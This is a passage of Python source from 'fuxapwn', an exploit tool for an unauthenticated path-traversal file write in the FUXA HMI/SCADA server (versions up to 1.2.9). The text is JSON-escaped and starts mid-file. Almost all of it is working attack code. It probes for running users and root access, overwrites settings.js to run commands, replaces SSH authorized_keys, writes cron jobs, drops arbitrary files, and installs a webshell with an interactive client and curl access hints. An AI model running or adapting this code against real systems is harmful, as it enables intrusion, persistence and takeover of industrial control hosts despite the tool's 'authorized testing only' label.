manually\\”, None)\\n \\n \\n def probe_home_directories(ex: \\”FuxaUploadExploit\\”, depth: int,\\n candidates: List[str]\\n ) -\\u003e Tuple[List[str], List[str]]:\\n \\”\\”\\”Iterate \/home\/\\u003ccandidate\\u003e\/ with a 0-byte write probe.\\n \\n The upload handler (server\/api\/projects\/index.js) runs\\n if (!fs.existsSync(dir)) fs.mkdirSync(dir, { recursive: true });\\n fs.writeFileSync(filePath, …);\\n so the failing syscall in the server’s error message tells us which step\\n tripped, and that determines what the filesystem actually looks like:\\n \\n * 200 OK -\\u003e home exists AND FUXA can write\\n -\\u003e likely the running user\\n * 400 EACCES, syscall=open\/write -\\u003e home dir exists but mode-0700 owned\\n by someone else -\\u003e OTHER user exists\\n * 400 EACCES, syscall=mkdir -\\u003e home dir does NOT exist; we tried\\n to create it under root-owned \/home\/\\n and got denied -\\u003e user absent\\n * 400 ENOENT -\\u003e deep ancestor missing (rare under\\n recursive mkdir); treat as absent\\n * anything else -\\u003e unexpected; stay silent\\n \\n Distinguishing mkdir-EACCES from open-EACCES is critical: without it,\\n every candidate in the wordlist reports as \\”account present\\” because\\n non-root FUXA can’t mkdir under \/home\/ regardless of whether the user\\n exists. See the fuxapwn write-up for the observed behaviour.\\n \\n Returns (writable_users, other_existing_users). Multiple entries in\\n writable_users indicate FUXA is root or group perms are loose; the\\n caller decides how to report.\\n \\”\\”\\”\\n writable: List[str] = []\\n other_exists: List[str] = []\\n markers: List[str] = []\\n for user in candidates:\\n marker = f\\”.fuxa-probe-{secrets.token_hex(4)}\\”\\n target = f\\”\/home\/{user}\/{marker}\\”\\n res = ex.write_arbitrary(target, b\\”\\”, appdir_depth=depth,\\n file_type=\\”svg\\”)\\n if res[\\”success\\”]:\\n print(f\\” [+] \/home\/{user}\/ is writable (likely user: {user})\\”,\\n flush=True)\\n writable.append(user)\\n markers.append(target)\\n continue\\n errno = res.get(\\”errno\\”)\\n syscall = res.get(\\”syscall\\”)\\n # Only an EACCES on the write itself (open\/write\/copyfile\/etc., i.e.\\n # anything that isn’t the pre-flight mkdir) proves the home dir\\n # exists. A mkdir EACCES just means \/home\/\\u003cuser\\u003e\/ is absent and we\\n # can’t create it.\\n if errno == \\”EACCES\\” and syscall and syscall != \\”mkdir\\”:\\n print(f\\” [*] \/home\/{user}\/ exists but is not writable \\”\\n \\”(EACCES on write) \u2014 account present, not the FUXA user\\”,\\n flush=True)\\n other_exists.append(user)\\n # All other outcomes (EACCES+mkdir, ENOENT, unknown) are treated as\\n # \\”not here\\” and stay silent \u2014 logging each miss drowns the signal.\\n if markers:\\n print(\\”[*] Probe markers left on target \u2014 clean up once you have exec:\\”,\\n flush=True)\\n for m in markers:\\n print(f\\” rm {m}\\”, flush=True)\\n return writable, other_exists\\n \\n \\n def do_recon(ex: \\”FuxaUploadExploit\\”, depth: int,\\n probe_root: bool = False, probe_home: bool = False,\\n home_candidates: Optional[List[str]] = None) -\\u003e int:\\n \\”\\”\\”Run –mode recon: fetch \/api\/settings (unauth), summarize running\\n context, infer likely OS user, and optionally probe \/root\/ or\\n \/home\/\\u003cuser\\u003e\/ writability to pin down the running user when paths\\n alone don’t leak it.\\n \\”\\”\\”\\n print(\\”[*] Stage 1 \u2014 GET \/api\/settings (unauthenticated leak)\\”, flush=True)\\n ok, info, settings = ex.fetch_settings()\\n if not ok or settings is None:\\n print(f\\”[-] \/api\/settings fetch failed: {info}\\”, flush=True)\\n return 1\\n \\n print(\\”[+] \/api\/settings returned JSON. Interesting fields:\\”, flush=True)\\n for k in _RECON_KEYS_INTERESTING:\\n if k in settings:\\n print(f\\” {k:22s} = {settings[k]!r}\\”, flush=True)\\n \\n # Path-based user inference.\\n print(\\”[*] Stage 2 \u2014 user inference from absolute path layout:\\”, flush=True)\\n candidates: \\”set[str]\\” = set()\\n saw_path = False\\n for k in _RECON_KEYS_PATHS:\\n v = settings.get(k)\\n if not isinstance(v, str) or not v.startswith(\\”\/\\”):\\n continue\\n saw_path = True\\n label, user = _infer_user_from_path(v)\\n suffix = f\\” -\\u003e likely user: {user}\\” if user else \\”\\”\\n print(f\\” {k}={v} [{label}]{suffix}\\”, flush=True)\\n if user:\\n candidates.add(user)\\n \\n if not saw_path:\\n print(\\” (no absolute paths reported \u2014 manual inspection required)\\”,\\n flush=True)\\n elif candidates:\\n print(f\\”[+] Likely running user(s): {‘, ‘.join(sorted(candidates))}\\”,\\n flush=True)\\n else:\\n print(\\”[!] Could not infer user from paths alone. Re-run with \\”\\n \\”–probe-root to confirm root access directly.\\”, flush=True)\\n \\n # Node-RED gate \u2014 key tell for instant unauth RCE.\\n if settings.get(\\”nodeRedEnabled\\”):\\n print(\\”[!] nodeRedEnabled=true \u2014 POST \/nodered\/flows and \\”\\n \\”\/nodered\/flows\/deploy bypass auth in allowDashboard \\”\\n \\”(server\/integrations\/node-red\/index.js:134-136). A function \\”\\n \\”node flow is instant unauth RCE; no FUXA restart required.\\”,\\n flush=True)\\n else:\\n print(\\”[*] nodeRedEnabled=false \u2014 Node-RED instant-RCE pivot not \\”\\n \\”currently available (would require flipping the setting and \\”\\n \\”a restart).\\”, flush=True)\\n \\n # Optional active probe: write a 0-byte marker to \/root\/.\\n root_writable: Optional[bool] = None\\n if probe_root:\\n marker = f\\”.fuxa-probe-{secrets.token_hex(4)}\\”\\n target = f\\”\/root\/{marker}\\”\\n print(f\\”[*] Stage 3 \u2014 probing \/root\/ writability via {target}\\”,\\n flush=True)\\n res = ex.write_arbitrary(target, b\\”\\”, appdir_depth=depth,\\n file_type=\\”svg\\”)\\n if res[\\”success\\”]:\\n root_writable = True\\n print(f\\”[+] \/root\/{marker} write SUCCEEDED \u2014 FUXA is running as \\”\\n f\\”root. (Clean up {target} once you have exec.)\\”,\\n flush=True)\\n else:\\n root_writable = False\\n errno = res.get(\\”errno\\”) or \\”unknown\\”\\n print(f\\”[-] \/root write failed (errno={errno}) \u2014 FUXA is NOT \\”\\n \\”root.\\”, flush=True)\\n \\n # Optional active probe: iterate \/home\/\\u003cuser\\u003e\/ candidates. Most useful\\n # when paths didn’t leak the user and root probe came back negative\\n # (or wasn’t run). If root was confirmed writable, we still run the\\n # probe if asked but annotate that positives are not conclusive.\\n if probe_home:\\n candidates = home_candidates if home_candidates else DEFAULT_HOME_CANDIDATES\\n stage = \\”Stage 4\\” if probe_root else \\”Stage 3\\”\\n print(f\\”[*] {stage} \u2014 probing \/home\/\\u003cuser\\u003e\/ writability across \\”\\n f\\”{len(candidates)} candidate(s)\\”, flush=True)\\n writable, other_exists = probe_home_directories(ex, depth, candidates)\\n \\n if other_exists:\\n print(f\\”[*] Other user accounts confirmed on target (home exists, \\”\\n f\\”not the FUXA user): {‘, ‘.join(other_exists)}. Useful for \\”\\n \\”lateral movement planning.\\”, flush=True)\\n \\n if not writable:\\n if other_exists:\\n print(\\”[-] None of the probed accounts ARE the FUXA user. \\”\\n \\”Extend the wordlist via –home-wordlist, or drop a \\”\\n \\”webshell\/cron payload to enumerate via exec.\\”,\\n flush=True)\\n else:\\n print(\\”[-] No \/home\/\\u003cuser\\u003e in the candidate list was writable \\”\\n \\”or even present. Target may not use \/home\/ layout \\”\\n \\”(e.g. \/var\/lib, \/opt, containerized). Extend via \\”\\n \\”–home-wordlist or pivot to webshell\/cron.\\”,\\n flush=True)\\n elif root_writable:\\n print(\\”[!] \/root was writable earlier, so FUXA is root and can \\”\\n \\”write to any \/home\/\\u003cuser\\u003e\/. The positives above do NOT \\”\\n \\”identify the running user.\\”, flush=True)\\n elif len(writable) == 1:\\n user = writable[0]\\n print(f\\”[+] Inferred running user: {user}\\”, flush=True)\\n print(f\\” Suggested follow-up for mode=ssh-key: –home \/home\/{user}\\”,\\n flush=True)\\n else:\\n print(f\\”[!] Multiple \/home\/\\u003cuser\\u003e\/ dirs were writable: \\”\\n f\\”{‘, ‘.join(writable)}. Unusual (loose group perms, shared \\”\\n \\”service account, or root). Confirm via webshell\/cron exec.\\”,\\n flush=True)\\n \\n return 0\\n \\n \\n # — Payload-time helpers ——————————————————\\n \\n def _fetch_real_settings_for_payload(ex: \\”FuxaUploadExploit\\”) -\\u003e Optional[Dict]:\\n \\”\\”\\”Fetch \/api\/settings so our settings.js replacement can preserve the\\n target’s real config. Returns None on failure (caller falls back to the\\n built-in default). Warns on operational gotchas (auth enabled, smtp set)\\n that the redaction behavior of \/api\/settings can’t round-trip.\\n \\”\\”\\”\\n print(\\”[*] Pre-fetching \/api\/settings so the replacement preserves the \\”\\n \\”target’s real config…\\”, flush=True)\\n ok, info, settings = ex.fetch_settings()\\n if not ok or settings is None:\\n print(f\\”[!] \/api\/settings fetch failed ({info}). Falling back to the \\”\\n \\”built-in default settings block \u2014 custom uiPort, \\”\\n \\”allowedOrigins, secureEnabled, etc. on the target will be \\”\\n \\”reset on next restart. Consider aborting if config fidelity \\”\\n \\”matters for this engagement.\\”, flush=True)\\n return None\\n # Operational warnings based on what we got back.\\n if settings.get(\\”secureEnabled\\”):\\n print(\\”[!] target has secureEnabled=true. \/api\/settings redacts \\”\\n \\”secretCode, so the replacement settings.js cannot round-trip \\”\\n \\”it. FUXA’s jwt-helper.js will fall back to the hardcoded \\”\\n \\”default ‘frangoteam751’, which invalidates any existing JWTs \\”\\n \\”if the target previously set a custom secretCode. Users will \\”\\n \\”be kicked out on next request after restart.\\”, flush=True)\\n if isinstance(settings.get(\\”smtp\\”), dict):\\n print(\\”[!] target has smtp configured. \/api\/settings redacts \\”\\n \\”smtp.password; replacement settings.js will have no smtp \\”\\n \\”password. Outgoing mail from FUXA will fail until restored.\\”,\\n flush=True)\\n print(f\\”[+] Pulled {len(settings)} settings keys; replacement will mirror \\”\\n \\”the target.\\”, flush=True)\\n return settings\\n \\n \\n # — Driver ——————————————————————–\\n \\n def run(args: argparse.Namespace) -\\u003e int:\\n if not args.quiet:\\n print(BANNER, flush=True)\\n \\n ex = FuxaUploadExploit(\\n base_url=args.url,\\n timeout=args.timeout,\\n verify_tls=not args.insecure,\\n proxy=args.proxy,\\n verbose=not args.quiet,\\n )\\n \\n print(f\\”[*] Target: {args.url}\\”, flush=True)\\n \\n # Recon mode runs on \/api\/settings directly \u2014 no canary needed, and we\\n # explicitly do NOT want to write anything unless –probe-root \/\\n # –probe-home is set.\\n if args.mode == \\”recon\\”:\\n ok, info = ex.fingerprint()\\n if ok:\\n print(f\\”[+] \/api\/version reachable, banner='{info}’\\”, flush=True)\\n else:\\n print(f\\”[-] \/api\/version unreachable: {info}\\”, flush=True)\\n if not args.force:\\n return 1\\n \\n # Load –home-wordlist if supplied. One username per line, blanks\\n # and ‘#’ comments ignored so the operator can paste from notes.\\n # BOM-aware so PowerShell-generated files (UTF-16 LE w\/ BOM is the\\n # PS 5.1 default for `echo x \\u003e file`) load without UnicodeDecodeError.\\n home_candidates: Optional[List[str]] = None\\n if args.home_wordlist:\\n try:\\n with open(args.home_wordlist, \\”rb\\”) as f:\\n raw = f.read()\\n except OSError as e:\\n print(f\\”[-] Could not read –home-wordlist {args.home_wordlist}: \\”\\n f\\”{e}\\”, flush=True)\\n return 2\\n if raw.startswith(b\\”\\\\xff\\\\xfe\\”):\\n text = raw.decode(\\”utf-16-le\\”).lstrip(\\”\\\\ufeff\\”)\\n elif raw.startswith(b\\”\\\\xfe\\\\xff\\”):\\n text = raw.decode(\\”utf-16-be\\”).lstrip(\\”\\\\ufeff\\”)\\n elif raw.startswith(b\\”\\\\xef\\\\xbb\\\\xbf\\”):\\n text = raw.decode(\\”utf-8-sig\\”)\\n else:\\n try:\\n text = raw.decode(\\”utf-8\\”)\\n except UnicodeDecodeError:\\n text = raw.decode(\\”latin-1\\”)\\n home_candidates = [\\n line.strip() for line in text.splitlines()\\n if line.strip() and not line.strip().startswith(\\”#\\”)\\n ]\\n if not home_candidates:\\n print(f\\”[-] –home-wordlist {args.home_wordlist} is empty after \\”\\n \\”stripping comments\/blanks.\\”, flush=True)\\n return 2\\n print(f\\”[*] Loaded {len(home_candidates)} home candidate(s) from \\”\\n f\\”{args.home_wordlist}\\”, flush=True)\\n \\n return do_recon(ex, depth=args.depth,\\n probe_root=args.probe_root,\\n probe_home=args.probe_home,\\n home_candidates=home_candidates)\\n \\n # Everything else uses the write primitive; start with the reachability +\\n # canary checks we’ve always done.\\n ok, info = ex.fingerprint()\\n if not ok:\\n print(f\\”[-] \/api\/version reachability failed: {info}\\”, flush=True)\\n if not args.force:\\n return 1\\n print(\\”[!] –force given, continuing anyway\\”, flush=True)\\n else:\\n print(f\\”[+] \/api\/version reachable, banner='{info}’\\”, flush=True)\\n \\n # webshell-exec is a pure client mode \u2014 no canary write.\\n if args.mode == \\”webshell-exec\\”:\\n if not (args.ws_host and args.ws_port and args.ws_path\\n and args.ws_token):\\n print(\\”[-] –ws-host, –ws-port, –ws-path, and –ws-token are \\”\\n \\”all required for mode=webshell-exec\\”, flush=True)\\n return 2\\n client = FuxaWebshellClient(\\n host=args.ws_host,\\n port=args.ws_port,\\n ws_path=args.ws_path,\\n ws_token=args.ws_token,\\n timeout=args.timeout + 60,\\n use_tls=args.ws_tls,\\n verify_tls=not args.insecure,\\n proxy=args.proxy,\\n )\\n if args.interact:\\n _interactive_loop(client)\\n return 0\\n if not args.ws_cmd:\\n print(\\”[-] –ws-cmd is required for mode=webshell-exec without \\”\\n \\”–interact\\”, flush=True)\\n return 2\\n code, body = client.exec(args.ws_cmd)\\n if code != 200:\\n print(f\\”[-] HTTP {code}: {body}\\”, flush=True)\\n return 1\\n sys.stdout.write(body)\\n if body and not body.endswith(\\”\\\\n\\”):\\n sys.stdout.write(\\”\\\\n\\”)\\n sys.stdout.flush()\\n return 0\\n \\n # 1) Run the proof-of-write canary first so we know the path traversal\\n # works on this instance before dropping anything heavier. Skippable\\n # via –no-canary for engagements where the extra filesystem artifact\\n # is undesirable.\\n if args.no_canary:\\n print(\\”[*] Stage 1 \u2014 canary SKIPPED (–no-canary). Proceeding \\”\\n \\”straight to mode-specific payload.\\”, flush=True)\\n else:\\n canary_path = args.canary or \\”\/tmp\/healthcheck\\”\\n if args.canary_content:\\n try:\\n with open(args.canary_content, \\”rb\\”) as f:\\n canary_body = f.read()\\n except OSError as e:\\n print(f\\”[-] Could not read –canary-content \\”\\n f\\”{args.canary_content}: {e}\\”, flush=True)\\n return 2\\n else:\\n canary_body = payload_proof(args.url)\\n print(f\\”[*] Stage 1 \u2014 proof-of-write canary -\\u003e {canary_path}\\”,\\n flush=True)\\n res = ex.write_arbitrary(canary_path, canary_body,\\n appdir_depth=args.depth)\\n print(f\\” HTTP {res[‘status_code’]} bytes={res[‘wrote_bytes’]} \\”\\n f\\”server={res[‘response_text’]!r}\\”, flush=True)\\n if res[\\”success\\”]:\\n print(f\\”[!] Canary left on target: {canary_path} \\”\\n f\\”(clean up once you have exec)\\”, flush=True)\\n else:\\n errno = res.get(\\”errno\\”)\\n if errno == \\”EACCES\\”:\\n print(\\”[-] Canary write failed (EACCES). FUXA lacks write \\”\\n \\”permission at the canary path. Use –canary to pick \\”\\n \\”a writable target (FUXA’s own _appdata dir, \/tmp, \\”\\n \\”or \/home\/\\u003cfuxa-user\\u003e\/).\\”, flush=True)\\n elif errno == \\”ENOENT\\”:\\n print(\\”[-] Canary write failed (ENOENT). The parent directory \\”\\n \\”of the canary path does not exist on the target. Use \\”\\n \\”–canary to point at an existing directory.\\”,\\n flush=True)\\n else:\\n print(\\”[-] Canary write failed. The instance may already be \\”\\n \\”patched, secured by an upstream WAF, or the appDir \\”\\n \\”depth is wrong (try –depth 12).\\”, flush=True)\\n if not args.force:\\n return 1\\n \\n # 2) Mode-specific follow-up\\n if args.mode == \\”canary\\”:\\n print(\\”[+] Done. Canary stage only (use –mode for more).\\”, flush=True)\\n return 0\\n \\n if args.mode == \\”settings-rce\\”:\\n if not args.cmd:\\n print(\\”[-] –cmd is required for mode=settings-rce\\”, flush=True)\\n return 2\\n if not args.appdata:\\n print(\\”[-] –appdata is required for mode=settings-rce \\”\\n \\”(absolute path to FUXA’s _appdata directory, e.g. \\”\\n \\”\/tmp\/FUXA-1.2.9\/server\/_appdata)\\”, flush=True)\\n return 2\\n real_settings = _fetch_real_settings_for_payload(ex)\\n target = posixpath.join(args.appdata.replace(\\”\\\\\\\\\\”, \\”\/\\”), \\”settings.js\\”)\\n print(f\\”[*] Stage 2 \u2014 writing replacement settings.js to {target}\\”,\\n flush=True)\\n res = ex.write_arbitrary(target,\\n payload_settings_js_rce(args.cmd,\\n real_settings),\\n appdir_depth=args.depth,\\n file_type=\\”svg\\”) # svg = raw text write\\n print(f\\” HTTP {res[‘status_code’]} bytes={res[‘wrote_bytes’]} \\”\\n f\\”server={res[‘response_text’]!r}\\”, flush=True)\\n if not res[\\”success\\”]:\\n errno = res.get(\\”errno\\”)\\n if errno:\\n print(f\\”[-] Write failed with errno={errno}.\\”, flush=True)\\n return 1\\n print(\\”[+] settings.js replaced. Payload will execute on the next \\”\\n \\”FUXA process start (admin restart, package update, host \\”\\n \\”reboot, or watchdog respawn).\\”, flush=True)\\n return 0\\n \\n if args.mode == \\”ssh-key\\”:\\n if not args.pubkey:\\n print(\\”[-] –pubkey FILE is required for mode=ssh-key\\”, flush=True)\\n return 2\\n if not args.home:\\n print(\\”[-] –home is required for mode=ssh-key (e.g. \/home\/fuxa \\”\\n \\”or \/root, depending on which user FUXA runs as \u2014 \\”\\n \\”determine this with –mode recon first)\\”, flush=True)\\n return 2\\n with open(args.pubkey, \\”r\\”, encoding=\\”utf-8\\”) as f:\\n pubkey = f.read()\\n home_posix = args.home.replace(\\”\\\\\\\\\\”, \\”\/\\”).rstrip(\\”\/\\”)\\n target = posixpath.join(home_posix, \\”.ssh\\”, \\”authorized_keys\\”)\\n \\n # Derive the account name from the home path for the success hint.\\n # \/home\/anthony -\\u003e anthony, \/root -\\u003e root, otherwise leave placeholder.\\n if home_posix == \\”\/root\\”:\\n target_user = \\”root\\”\\n elif home_posix.startswith(\\”\/home\/\\”):\\n target_user = home_posix[len(\\”\/home\/\\”):].split(\\”\/\\”, 1)[0] or \\”\\u003cuser\\u003e\\”\\n else:\\n target_user = \\”\\u003cuser\\u003e\\”\\n \\n # The write primitive can only OVERWRITE the file \u2014 we have no read\\n # primitive, so we cannot read-then-append to preserve existing keys.\\n # Announce this loudly so the operator doesn’t brick legitimate\\n # access for the real account owner.\\n print(\\”[!] WARNING: this mode OVERWRITES the entire authorized_keys \\”\\n \\”file. Any keys currently authorized for this account will no \\”\\n \\”longer work. For engagements where that matters, install a \\”\\n \\”webshell first, use it to `cat` the existing authorized_keys, \\”\\n \\”append your key locally, then `–mode drop` the combined \\”\\n f\\”file back to {target}.\\”, flush=True)\\n print(f\\”[*] Stage 2 \u2014 writing (OVERWRITE) pubkey -\\u003e {target}\\”,\\n flush=True)\\n res = ex.write_arbitrary(target,\\n payload_authorized_keys(pubkey),\\n appdir_depth=args.depth,\\n file_type=\\”svg\\”)\\n print(f\\” HTTP {res[‘status_code’]} bytes={res[‘wrote_bytes’]} \\”\\n f\\”server={res[‘response_text’]!r}\\”, flush=True)\\n if res[\\”success\\”]:\\n # Figure out the host:port for the hint string from –url.\\n parsed = urlparse(args.url)\\n host_hint = parsed.hostname or \\”\\u003ctarget-host\\u003e\\”\\n print(f\\”[+] Key written. Try: ssh -i {args.pubkey.replace(‘.pub’, ”)} \\”\\n f\\”{target_user}@{host_hint}\\”, flush=True)\\n return 0\\n \\n errno = res.get(\\”errno\\”)\\n if errno == \\”ENOENT\\”:\\n print(f\\”[-] Write failed (ENOENT) \u2014 {home_posix}\/.ssh\/ likely does \\”\\n \\”not exist on the target. fs.writeFileSync cannot create \\”\\n \\”parent directories. Workaround: drop a webshell or cron \\”\\n f\\”payload first, run `mkdir -p {home_posix}\/.ssh \\u0026\\u0026 chmod \\”\\n f\\”700 {home_posix}\/.ssh` through it, then retry this mode.\\”,\\n flush=True)\\n elif errno == \\”EACCES\\”:\\n print(f\\”[-] Write failed (EACCES) \u2014 FUXA does not have write \\”\\n f\\”access to {home_posix}\/.ssh\/. Either –home is wrong \\”\\n \\”(recon with –probe-home to confirm the running user), \\”\\n \\”or the directory is mode 0700 owned by a different user.\\”,\\n flush=True)\\n elif errno:\\n print(f\\”[-] Write failed with errno={errno}.\\”, flush=True)\\n return 1\\n \\n if args.mode == \\”drop\\”:\\n if not args.target or args.payload_file is None:\\n print(\\”[-] –target and –payload-file are required for mode=drop\\”,\\n flush=True)\\n return 2\\n with open(args.payload_file, \\”rb\\”) as f:\\n content = f.read()\\n print(f\\”[*] Stage 2 \u2014 dropping {args.payload_file} ({len(content)} B)\\”\\n f\\” -\\u003e {args.target}\\”, flush=True)\\n res = ex.write_arbitrary(args.target, content,\\n appdir_depth=args.depth,\\n file_type=args.file_type)\\n print(f\\” HTTP {res[‘status_code’]} bytes={res[‘wrote_bytes’]} \\”\\n f\\”server={res[‘response_text’]!r}\\”, flush=True)\\n if not res[\\”success\\”]:\\n errno = res.get(\\”errno\\”)\\n if errno == \\”ENOENT\\”:\\n print(f\\”[-] Drop failed (ENOENT). The parent directory of \\”\\n f\\”{args.target} does not exist \u2014 fs.writeFileSync won’t \\”\\n \\”mkdir. Use an existing directory, or drop a webshell \\”\\n \\”first and run `mkdir -p` through it.\\”, flush=True)\\n elif errno == \\”EACCES\\”:\\n print(f\\”[-] Drop failed (EACCES). FUXA lacks write permission \\”\\n f\\”at {args.target}. Target a directory owned by (or \\”\\n \\”writable by) the FUXA service user.\\”, flush=True)\\n elif errno:\\n print(f\\”[-] Drop failed with errno={errno}.\\”, flush=True)\\n return 1\\n return 0\\n \\n if args.mode == \\”cron\\”:\\n if not args.cron_cmd:\\n print(\\”[-] –cron-cmd is required for mode=cron\\”, flush=True)\\n return 2\\n cron_path = args.cron_path\\n schedule = args.cron_schedule\\n \\n # Decide whether to include a user field, based on the cron file\\n # format conventions. \/etc\/cron.d\/* and \/etc\/crontab require one;\\n # \/var\/spool\/cron\/crontabs\/\\u003cuser\\u003e style files must NOT have one.\\n if args.cron_user is None:\\n if cron_path.startswith(\\”\/etc\/cron.d\/\\”) or cron_path == \\”\/etc\/crontab\\”:\\n user_field: Optional[str] = \\”root\\”\\n else:\\n user_field = None\\n elif args.cron_user == \\”\\”:\\n user_field = None\\n else:\\n user_field = args.cron_user\\n \\n body = payload_cron_job(schedule, user_field, args.cron_cmd)\\n print(f\\”[*] Cron file : {cron_path}\\”, flush=True)\\n print(f\\”[*] Schedule : {schedule}\\”, flush=True)\\n print(f\\”[*] Run-as user : {user_field or ‘(none \u2014 user-crontab format)’}\\”,\\n flush=True)\\n print(f\\”[*] Command : {args.cron_cmd}\\”, flush=True)\\n print(f\\”[*] Body:\\\\n{body.decode(‘utf-8′, errors=’replace’).rstrip()}\\”,\\n flush=True)\\n print(f\\”[*] Stage 2 \u2014 writing cron file\\”, flush=True)\\n res = ex.write_arbitrary(cron_path, body,\\n appdir_depth=args.depth,\\n file_type=\\”svg\\”)\\n print(f\\” HTTP {res[‘status_code’]} bytes={res[‘wrote_bytes’]} \\”\\n f\\”server={res[‘response_text’]!r}\\”, flush=True)\\n if not res[\\”success\\”]:\\n errno = res.get(\\”errno\\”)\\n if errno == \\”EACCES\\”:\\n print(f\\”[-] Cron write failed (EACCES). FUXA is NOT running \\”\\n f\\”as a user that can write {cron_path}. For non-root \\”\\n \\”FUXA, try \/var\/spool\/cron\/crontabs\/\\u003cfuxa-user\\u003e \\”\\n \\”(Debian\/Vixie) or \/var\/spool\/cron\/\\u003cfuxa-user\\u003e \\”\\n \\”(RHEL\/cronie). Note: those user-crontab paths usually \\”\\n \\”require mode 0600 which fs.writeFileSync cannot set \u2014 \\”\\n \\”cronie accepts, Vixie rejects. Use –mode recon \\”\\n \\”–probe-home to confirm the running user first.\\”,\\n flush=True)\\n elif errno == \\”ENOENT\\”:\\n print(f\\”[-] Cron write failed (ENOENT). Parent directory of \\”\\n f\\”{cron_path} doesn’t exist on this target \u2014 cron is \\”\\n \\”either not installed or uses a different layout.\\”,\\n flush=True)\\n elif errno:\\n print(f\\”[-] Cron write failed with errno={errno}.\\”, flush=True)\\n else:\\n print(\\”[-] Cron write failed. Common causes: FUXA is not \\”\\n \\”running as root (cannot write into \/etc\/cron.d\/), the \\”\\n \\”target uses a cron variant that requires mode 0600 on \\”\\n \\”user-crontab files, or the cron path on this distro \\”\\n \\”is different. Use –mode recon to confirm the running \\”\\n \\”user before retrying.\\”, flush=True)\\n return 1\\n if cron_path.startswith(\\”\/etc\/cron.d\/\\”):\\n print(\\”[+] \/etc\/cron.d\/ is re-read by cron every minute; expect \\”\\n \\”first execution within 60 s. No FUXA restart required.\\”,\\n flush=True)\\n else:\\n print(\\”[+] Cron file written. First execution within 60 s if \\”\\n \\”the cron daemon accepts this path and mode (user-crontab \\”\\n \\”paths often require 0600 \u2014 validate on target). No FUXA \\”\\n \\”restart required.\\”, flush=True)\\n return 0\\n \\n if args.mode == \\”webshell\\”:\\n # Required input: the _appdata directory where settings.js lives.\\n if not args.appdata:\\n print(\\”[-] –appdata is required for mode=webshell \\”\\n \\”(absolute path to FUXA’s _appdata directory, e.g. \\”\\n \\”\/tmp\/FUXA-1.2.9\/server\/_appdata)\\”, flush=True)\\n return 2\\n \\n # Generate secrets if the operator didn’t supply them. Reusing the\\n # same values across runs makes –mode webshell-exec \/ –interact\\n # trivial, so we echo them back prominently.\\n ws_port = args.ws_port\\n ws_path = args.ws_path or (\\”\/_\\” + secrets.token_hex(12))\\n if not ws_path.startswith(\\”\/\\”):\\n ws_path = \\”\/\\” + ws_path\\n ws_token = args.ws_token or secrets.token_urlsafe(24)\\n \\n real_settings = _fetch_real_settings_for_payload(ex)\\n target = posixpath.join(args.appdata.replace(\\”\\\\\\\\\\”, \\”\/\\”), \\”settings.js\\”)\\n print(f\\”[*] Webshell port : {ws_port}\\”, flush=True)\\n print(f\\”[*] Webshell path : {ws_path}\\”, flush=True)\\n print(f\\”[*] Webshell token : {ws_token}\\”, flush=True)\\n print(f\\”[*] Stage 2 \u2014 writing webshell payload to {target}\\”,\\n flush=True)\\n res = ex.write_arbitrary(target,\\n payload_webshell_js(ws_port, ws_path,\\n ws_token,\\n real_settings),\\n appdir_depth=args.depth,\\n file_type=\\”svg\\”) # svg = raw text write\\n print(f\\” HTTP {res[‘status_code’]} bytes={res[‘wrote_bytes’]} \\”\\n f\\”server={res[‘response_text’]!r}\\”, flush=True)\\n if not res[\\”success\\”]:\\n errno = res.get(\\”errno\\”)\\n if errno:\\n print(f\\”[-] Payload write failed with errno={errno}.\\”,\\n flush=True)\\n else:\\n print(\\”[-] Payload write failed \u2014 see canary diagnostics \\”\\n \\”above.\\”, flush=True)\\n return 1\\n \\n print(\\”[+] Webshell payload installed. Listener activates on the \\”\\n \\”next FUXA cold start (admin restart, package update, host \\”\\n \\”reboot, watchdog\/pm2\/systemd respawn, docker restart). \\”\\n \\”Consider pairing with –mode cron for a near-immediate \\”\\n \\”execution window that doesn’t depend on FUXA restarting.\\”,\\n flush=True)\\n \\n # Derive the target host from –url for helper strings and auto-interact.\\n parsed = urlparse(args.url)\\n host = parsed.hostname or \\”\\”\\n use_tls = parsed.scheme == \\”https\\”\\n \\n curl_url = f\\”http{‘s’ if use_tls else ”}:\/\/{host}:{ws_port}{ws_path}\\”\\n print(\\”\\\\n[*] Once FUXA restarts, reach the shell with either:\\”, flush=True)\\n print(f\\” curl -s -H ‘X-Auth-Token: {ws_token}’ \\\\\\\\\\\\n\\”\\n f\\” –data-urlencode ‘cmd=id’ ‘{curl_url}’\\”, flush=True)\\n print(f\\” curl -s ‘{curl_url}?t={quote(ws_token, safe=”)}\\”\\n f\\”\\u0026cmd={quote(‘id’, safe=”)}’\\”, flush=True)\\n print(f\\” {sys.argv[0]} -u {args.url} –mode webshell-exec \\\\\\\\\\\\n\\”\\n f\\” –ws-host {host} –ws-port {ws_port} \\\\\\\\\\\\n\\”\\n f\\” –ws-path ‘{ws_path}’ –ws-token ‘{ws_token}’ \\\\\\\\\\\\n\\”\\n f\\” –ws-cmd ‘id’\\”, flush=True)\\n \\n if args.interact:\\n client = FuxaWebshellClient(\\n host=args.ws_host or host,\\n port=ws_port,\\n ws_path=ws_path,\\n ws_token=ws_token,\\n timeout=args.timeout + 60,\\n use_tls=(args.ws_tls or use_tls),\\n verify_tls=not args.insecure,\\n proxy=args.proxy,\\n )\\n _interactive_loop(client)\\n \\n return 0\\n \\n print(f\\”[-] Unknown mode: {args.mode}\\”, flush=True)\\n return 2\\n \\n \\n def parse_args(argv: list[str]) -\\u003e argparse.Namespace:\\n p = argparse.ArgumentParser(\\n prog=\\”fuxapwn\\”,\\n description=(\\”FUXA \\u003c=1.2.9 unauthenticated path-traversal arbitrary \\”\\n \\”file write (CVE-2026-25895). Authorized testing only.\\”),\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\n epilog=(\\n \\”Examples:\\\\n\\”\\n \\” # Unauth recon \u2014 identify running user + Node-RED status:\\\\n\\”\\n \\” %(prog)s -u http:\/\/target:1881 –mode recon\\\\n\\\\n\\”\\n \\” # Same, plus an active probe that confirms whether FUXA is root:\\\\n\\”\\n \\” %(prog)s -u http:\/\/target:1881 –mode recon –probe-root\\\\n\\\\n\\”\\n \\” # Same, plus probe \/home\/\\u003cuser\\u003e\/ to name a non-root service user\\\\n\\”\\n \\” # when install paths didn’t leak it:\\\\n\\”\\n \\” %(prog)s -u http:\/\/target:1881 –mode recon \\\\\\\\\\\\n\\”\\n \\” –probe-root –probe-home\\\\n\\\\n\\”\\n \\” # Probe with a custom username wordlist (one name per line):\\\\n\\”\\n \\” %(prog)s -u http:\/\/target:1881 –mode recon \\\\\\\\\\\\n\\”\\n \\” –probe-home 